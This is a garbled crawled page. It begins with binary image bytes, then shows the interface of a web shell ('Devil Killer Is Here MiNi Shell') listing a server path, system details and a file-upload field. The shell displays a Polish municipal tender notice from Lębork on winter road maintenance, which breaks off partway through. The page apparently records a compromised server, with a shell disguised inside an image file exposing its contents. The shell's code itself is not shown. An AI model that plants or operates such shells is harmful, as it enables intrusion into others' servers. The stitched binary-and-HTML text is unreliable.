JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211125/0028404201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ZIMOWE UTRZYMANIE DRÓG GMINNYCH ORAZ DRÓG WEWNĘTRZNYCH STANOWIĄCYCH WŁASNOŚĆ GMINY MIASTO LĘBORK PODCZAS AKCJI ZIMOWEJ W SEZONIE 2021 – 2022R </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Lębork</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979737</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lębork</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">598637836</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@um.lebork.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.lebork.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZIMOWE UTRZYMANIE DRÓG GMINNYCH ORAZ DRÓG WEWNĘTRZNYCH STANOWIĄCYCH WŁASNOŚĆ GMINY MIASTO LĘBORK PODCZAS AKCJI ZIMOWEJ W SEZONIE 2021 – 2022R </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a4350190-4dd6-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00284042</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00007574/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Akcja Zima ( odśnieżanie ulic. Chodników, dróg gminnych na terenie miasta Lęborka w okresie 2021-2023</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lebork <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lebork</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu środków komunikacji<br/>elektronicznej, za pośrednictwem Platformy zakupowej dostępnej na stronie Urzędu Miasta, pod<br/>adresem https://platformazakupowa.pl/pn/lebork zwanej dalej Platformą. Szczegółowe informacje<br/>dotyczące przyjętego w postępowaniu sposobu komunikacji znajdują się w rozdziale III podrozdział 1<br/>niniejszej SWZ.<br/>UWAGA! Przed przystąpieniem do składania oferty Wykonawca jest zobowiązany zapoznać się z<br/>Instrukcją korzystania z Platformy zakupowej. Instrukcja została zamieszczona także bezpośrednio na<br/>ww Platformie zakupowej. (https://platformazakupowa.pl/strona/45-instrukcje )</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający realizuje obowiązek informacyjny w dokumentach zamówienia (SWZ)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający realizuje obowiązek informacyjny w dokumentach zamówienia (SWZ)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.21.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE 1 - ZIMOWE UTRZYMANIE CIĄGÓW JEZDNYCH PRZY UŻYCIU 2 SOLAREK DROGOWYCH NA TERENIE SEKTORÓW „PÓŁNOC” I „POŁUDNIE<br/>1.) Przedmiot zamówienia stanowi zimowe utrzymanie dróg gminnych oraz dróg wewnętrznych stanowiących własność Gminy Miasto Lębork w granicach administracyjnych miasta Lęborka w sezonie zimowym – 2021/2022. Zakresem objętym przedmiotem zamówienia jest również zaopatrzenie sprzętu w niezbędne kruszywa do usuwania śliskości i oblodzeń. <br/>2) Zimowe utrzymanie będzie wykonywane zgodnie z IV i V standardem utrzymania dróg w okresie zimowym. Standard ten określony został w Załączniku nr 1 do SWZ.<br/>3) Usługę należy wykonywać w przypadku wystąpienia zjawisk atmosferycznych wymagających konieczności zimowego utrzymania.”<br/>4) Szacowana ilość roboczogodzin pracy sprzętu przy usuwaniu śliskości z wykorzystaniem pełnego zestawu sprzętu zimowego: solarka drogowa na samochodzie ciężarowym z zawieszanym pługiem drogowym sterowanym hydraulicznie – 340 rg łącznie na dwa sektory „PÓŁNOC” LUB „POŁUDNIE”<br/>5) Szacowana ilość roboczogodzin pracy sprzętu przy zgarnianiu śniegu lub błota pośniegowego z wykorzystaniem zestawu sprzętu zimowego: (samochód ciężarowy z zawieszanym pługiem drogowym sterowanym hydraulicznie) - 100 rg łącznie na dwa sektory „PÓŁNOC” LUB „POŁUDNIE”<br/>6.) Szczegółowy opis przedmiotu zamówienia, opis wymagań Zamawiającego w zakresie realizacji przedmiotu zamówienia określają:<br/> • opis przedmiotu zamówienia (zwany OPZ) – załącznik nr 1 do SWZ, będący jednocześnie załącznikiem do umowy.<br/> • projektowane postanowienia umowy (projekt umowy) – załącznik nr 4 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.)Zamawiający przewiduje skorzystania z Prawa opcji, o którym mowa w art. 31 ust. 2 ustawy Pzp w wysokości 30% wartości zamówienia podstawowego.<br/>2.) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji:<br/> • Procedura wykorzystująca prawo opcji dotyczy wszystkich części zamówienia<br/>• Zastosowanie przez Zamawiającego prawo opcji obejmuje możliwość rozszerzenia tego samego zakresu zamówienia podstawowego w każdej części (tj. w ramach umowy podstawowej).<br/>• W wyniku zastosowania prawa opcji wynagrodzenie Wykonawcy ulegnie zwiększeniu proporcjonalnie do faktycznie wykonanych usług. <br/>• Ceny jednostkowe dla zamówienia realizowanego w ramach prawa opcji będą takie same jak ceny jednostkowe określone dla zamówienia podstawowego.<br/>• Wszystkie wymagania zawarte w SWZ dotyczą także realizacji zamówienia w ramach prawa opcji. <br/>• Zastosowanie przez Zamawiającego prawa opcji związane jest z warunkami pogodowymi lub innymi zmianami, których Zamawiający nie był w stanie przewidzieć w momencie udzielania zamówienia, a które odnoszą się do zakresu zamówienia podstawowego, w szczególności zwiększoną intensywnością opadów śniegu i powstaniem ślizgawicy.<br/>3.) Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać, w ramach realizacji niniejszego zamówienia. W przypadku nieskorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu. <br/>4.) Warunkiem uruchomienia prawa opcji jest oświadczenie woli Zamawiającego wykonania zamówienia w ramach prawa opcji i złożenie odpowiedniego zamówienia częściowego wykraczającego poza wykonanie usług stanowiących zamówienie podstawowe przedłożone Wykonawcy w formie pisemnej. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>1.) Cena – waga kryterium 60% (60pkt);<br/>2.) Czas przystąpienia do realizacji usługi – waga kryterium 40% (40pkt).<br/>2. Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-punktowej.<br/>KRYTERIUM: CENA – 60% , WAGA 60 pkt<br/>Liczba punktów w kryterium „CENA” (C) zostanie obliczona, według poniższych zasad:<br/> • Ocenie podlega cena całkowita brutto oferty wyrażona w PLN. <br/> • Ofercie z najniższą ceną Zamawiający przyzna maksymalną liczbę punktów – 60 pkt.<br/> • Pozostałym ofertom Zamawiający przyzna punkty obliczone wg wzoru:<br/><br/><br/>Cena najniższa ze wszystkich ofert x Znaczenie kryterium 60%<br/>Cena oferty badanej<br/><br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium: CENA.<br/><br/>KRYTERIUM: CZAS PRZYSTĄPIENIA DO REALIZACJI ZADANIA – 40% , WAGA 40 pkt <br/>Liczba punktów w kryterium „CZAS PRZYSTĄPIENIA DO REALIZACJI ZADANIA” (CRZ) zostanie obliczona, według poniższych zasad:<br/> • Ocenie podlegać będzie czas przystąpienia do realizacji zadania wyrażony w godzinach wynikający z oferty złożonej przez Wykonawcę.<br/> • W przypadku zaoferowania przez Wykonawcę czasu realizacji zadania wyrażony w godzinach oferta może uzyskać od 20 pkt. i 40 pkt.<br/> • Termin realizacji zadania wyrażony w godzinach nie może być dłuższy niż 1 h. Zaoferowanie okresu dłuższego niż 1 h skutkowało będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp . <br/> • W przypadku niewpisania przez Wykonawcę czasu realizacji zadania wyrażony w godzinach, Zamawiający uzna, że Wykonawca zaoferował okres maksymalny (max) (wymagany) wynoszący 1 h.<br/>Ocena punktowa oferty w tym kryterium zostanie przeprowadzona następującego:<br/> • Oferta, której zadeklarowany zostanie czas do ½ h od zgłoszenia otrzyma - 40 pkt<br/> • Oferta, której zadeklarowany zostanie czas do 1 h od zgłoszenia otrzyma - 20 pkt<br/> • Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium: „CZAS PRZYSTĄPIENIA DO REALIZACJI ZADANIA”<br/><br/>Zamawiający dokona zsumowania punktów przyznanych w kryteriach. tj.:<br/>Łączna liczba punktów za ofertę = liczba punktów za C brutto (max. 60) + liczba punktów za CRZ (max. 40). Maksymalnie oferta może uzyskać 100 pkt. <br/>2. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>3. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">CZAS PRZYSTĄPIENIA DO REALIZACJI ZADANIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ODŚNIEŻANIE CIĄGÓW JEZDNYCH NA TERENIE SEKTORÓW „PÓŁNOC” LUB „POŁUDNIE”<br/>1.) Przedmiot zamówienia stanowi zimowe utrzymanie dróg gminnych oraz dróg wewnętrznych stanowiących własność Gminy Miasto Lębork w granicach administracyjnych miasta Lęborka w sezonie zimowym – 2021/2022. <br/>2) Zimowe utrzymanie będzie wykonywane zgodnie z IV i V standardem utrzymania dróg w okresie zimowym. Standard ten określony został w Załączniku nr 1 do SWZ.<br/>3) Usługę należy wykonywać w przypadku wystąpienia zjawisk atmosferycznych wymagających konieczności zimowego utrzymania.”<br/>4.) Szacowana ilość roboczogodzin pracy sprzętu przy zgarnianiu śniegu lub błota pośniegowego z wykorzystaniem zestawu sprzętu zimowego: samochód ciężarowy z zawieszanym pługiem drogowym sterowanym hydraulicznie – 300 rg<br/> 5.) Szczegółowy opis przedmiotu zamówienia, opis wymagań Zamawiającego w zakresie realizacji przedmiotu zamówienia określają:<br/> • opis przedmiotu zamówienia (zwany OPZ) – załącznik nr 1 do SWZ, będący jednocześnie załącznikiem do umowy.<br/> • projektowane postanowienia umowy (projekt umowy) – załącznik nr 4 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.)Zamawiający przewiduje skorzystania z Prawa opcji, o którym mowa w art. 31 ust. 2 ustawy Pzp w wysokości 30% wartości zamówienia podstawowego.<br/>2.) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji:<br/> • Procedura wykorzystująca prawo opcji dotyczy wszystkich części zamówienia<br/>• Zastosowanie przez Zamawiającego prawo opcji obejmuje możliwość rozszerzenia tego samego zakresu zamówienia podstawowego w każdej części (tj. w ramach umowy podstawowej).<br/>• W wyniku zastosowania prawa opcji wynagrodzenie Wykonawcy ulegnie zwiększeniu proporcjonalnie do faktycznie wykonanych usług. <br/>• Ceny jednostkowe dla zamówienia realizowanego w ramach prawa opcji będą takie same jak ceny jednostkowe określone dla zamówienia podstawowego.<br/>• Wszystkie wymagania zawarte w SWZ dotyczą także realizacji zamówienia w ramach prawa opcji. <br/>• Zastosowanie przez Zamawiającego prawa opcji związane jest z warunkami pogodowymi lub innymi zmianami, których Zamawiający nie był w stanie przewidzieć w momencie udzielania zamówienia, a które odnoszą się do zakresu zamówienia podstawowego, w szczególności zwiększoną intensywnością opadów śniegu i powstaniem ślizgawicy.<br/>3.) Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać, w ramach realizacji niniejszego zamówienia. W przypadku nieskorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu. <br/>4.) Warunkiem uruchomienia prawa opcji jest oświadczenie woli Zamawiającego wykonania zamówienia w ramach prawa opcji i złożenie odpowiedniego zamówienia częściowego wykraczającego poza wykonanie usług stanowiących zamówienie podstawowe przedłożone Wykonawcy w formie pisemnej. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>1.) Cena – waga kryterium 60% (60pkt);<br/>2.) Czas przystąpienia do realizacji usługi – waga kryterium 40% (40pkt).<br/>2. Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-punktowej.<br/>KRYTERIUM: CENA – 60% , WAGA 60 pkt<br/>Liczba punktów w kryterium „CENA” (C) zostanie obliczona, według poniższych zasad:<br/> • Ocenie podlega cena całkowita brutto oferty wyrażona w PLN. <br/> • Ofercie z najniższą ceną Zamawiający przyzna maksymalną liczbę punktów – 60 pkt.<br/> • Pozostałym ofertom Zamawiający przyzna punkty obliczone wg wzoru:<br/><br/><br/>Cena najniższa ze wszystkich ofert x Znaczenie kryterium 60%<br/>Cena oferty badanej<br/><br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium: CENA.<br/><br/>KRYTERIUM: CZAS PRZYSTĄPIENIA DO REALIZACJI ZADANIA – 40% , WAGA 40 pkt <br/>Liczba punktów w kryterium „CZAS PRZYSTĄPIENIA DO REALIZACJI ZADANIA” (CRZ) zostanie obliczona, według poniższych zasad:<br/> • Ocenie podlegać będzie czas przystąpienia do realizacji zadania wyrażony w godzinach wynikający z oferty złożonej przez Wykonawcę.<br/> • W przypadku zaoferowania przez Wykonawcę czasu realizacji zadania wyrażony w godzinach oferta może uzyskać od 20 pkt. i 40 pkt.<br/> • Termin realizacji zadania wyrażony w godzinach nie może być dłuższy niż 1 h. Zaoferowanie okresu dłuższego niż 1 h skutkowało będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp . <br/> • W przypadku niewpisania przez Wykonawcę czasu realizacji zadania wyrażony w godzinach, Zamawiający uzna, że Wykonawca zaoferował okres maksymalny (max) (wymagany) wynoszący 1 h.<br/>Ocena punktowa oferty w tym kryterium zostanie przeprowadzona następującego:<br/> • Oferta, której zadeklarowany zostanie czas do ½ h od zgłoszenia otrzyma - 40 pkt<br/> • Oferta, której zadeklarowany zostanie czas do 1 h od zgłoszenia otrzyma - 20 pkt<br/> • Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium: „CZAS PRZYSTĄPIENIA DO REALIZACJI ZADANIA”<br/><br/>Zamawiający dokona zsumowania punktów przyznanych w kryteriach. tj.:<br/>Łączna liczba punktów za ofertę = liczba punktów za C brutto (max. 60) + liczba punktów za CRZ (max. 40). Maksymalnie oferta może uzyskać 100 pkt. <br/>2. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>3. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">CZAS PRZYSTĄPIENIA DO REALIZACJI ZADANIA</span></h3> 